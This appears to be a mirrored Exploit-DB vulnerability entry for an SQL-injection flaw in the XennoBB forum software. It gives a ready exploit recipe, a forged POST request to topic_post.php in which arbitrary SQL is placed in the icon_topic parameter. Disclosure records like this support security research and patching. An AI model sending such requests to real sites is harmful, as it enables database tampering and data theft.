exploit-db-mirror/platforms/php/webapps/28406.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

18 lines
602 B
Text
Executable file

source: http://www.securityfocus.com/bid/19606/info
XennoBB is prone to an SQL-injection vulnerability that could allow an attacker to influence the structure or logic of SQL queries made by the application.
--------------------- EXPLOIT ---------------------
Submit a forged POST request to
topic_post.php?action=post&fid={forum ID here}
With the following as the POST data:
form_sent=1&form_user={username
here}&req_subject=Subject&req_message=Message&submit=1&icon_topic=[SQL]
Successful exploitation leads would lead to the SQL query in the
icon_topic
parameter being run.